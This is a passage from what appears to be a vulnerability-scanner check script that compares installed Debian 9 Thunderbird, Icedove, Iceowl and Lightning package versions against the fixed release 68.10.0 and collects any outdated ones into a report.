rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ro\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ru\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-si\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sq\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sv-se\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ta-lk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-tr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-uk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-vi\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-zh-cn\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-zh-tw\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-extension\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ar\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ast\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-be\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-bg\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-bn-bd\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-br\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ca\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-cs\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-cy\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-da\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-de\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-dsb\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-el\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-en-gb\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-es-ar\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-es-es\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-et\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-eu\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-fi\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-fr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-fy-nl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ga-ie\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-gd\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-gl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-he\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hsb\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hu\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hy-am\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-id\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-is\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-it\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ja\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-kab\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ko\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-lt\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-nb-no\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-nl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-nn-no\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pa-in\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pt-br\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pt-pt\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-rm\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ro\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ru\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-si\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sq\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sv-se\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ta-lk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-tr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-uk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-vi\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-zh-cn\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-zh-tw\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ar\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ast\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-be\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-bg\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-bn-bd\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-br\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ca\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-cs\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-cy\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-da\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-de\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-dsb\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-el\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-en-gb\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-es-ar\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-es-es\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-et\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-eu\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fi\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fy-nl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ga-ie\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-gd\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-gl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-he\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hsb\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hu\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hy-am\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-id\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-is\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-it\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ja\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-kab\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-kk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ko\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-lt\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ms\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nb-no\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nn-no\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pa-in\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pt-br\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pt-pt\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-rm\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ro\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ru\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-si\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sq\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sv-se\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ta-lk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-tr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-uk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-vi\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-zh-cn\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-zh-tw\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-dbg\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-dev\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-all\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ar\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ast\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-be\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-bg\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-bn-bd\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-br\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ca\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-cs\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-cy\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-da\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-de\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-dsb\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-el\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-en-gb\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-es-ar\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-es-es\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-et\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-eu\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fi\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fy-nl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ga-ie\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-gd\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-gl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-he\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hsb\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hu\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hy-am\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-id\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-is\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-it\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ja\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-kab\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-kk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ko\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-lt\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ms\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nb-no\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += 